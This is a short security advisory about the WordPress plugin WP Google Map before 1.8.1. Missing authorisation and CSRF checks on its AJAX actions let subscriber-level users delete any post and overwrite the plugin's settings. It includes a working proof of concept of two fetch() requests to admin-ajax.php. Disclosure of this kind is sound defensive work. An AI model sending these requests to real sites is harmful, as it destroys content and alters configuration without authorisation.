WP Google Map < 1.8.1 - Subscriber+ Arbitrary Post Deletion and Plugin's Settings Update

The plugin does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin’s settings. v1.8.1 added authorisation checks, however CSRF was still missing and a separate advisory has been created for that

PoC

Removing post: fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=wpgmapembed_remove_wpgmap&post;_id=1”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Updating settings: fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=wpgmapembed_save_setup_wizard&wgm;_api_key=hohohoho&wgm;_language=999&wgm;_regional_area=aaaaa”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));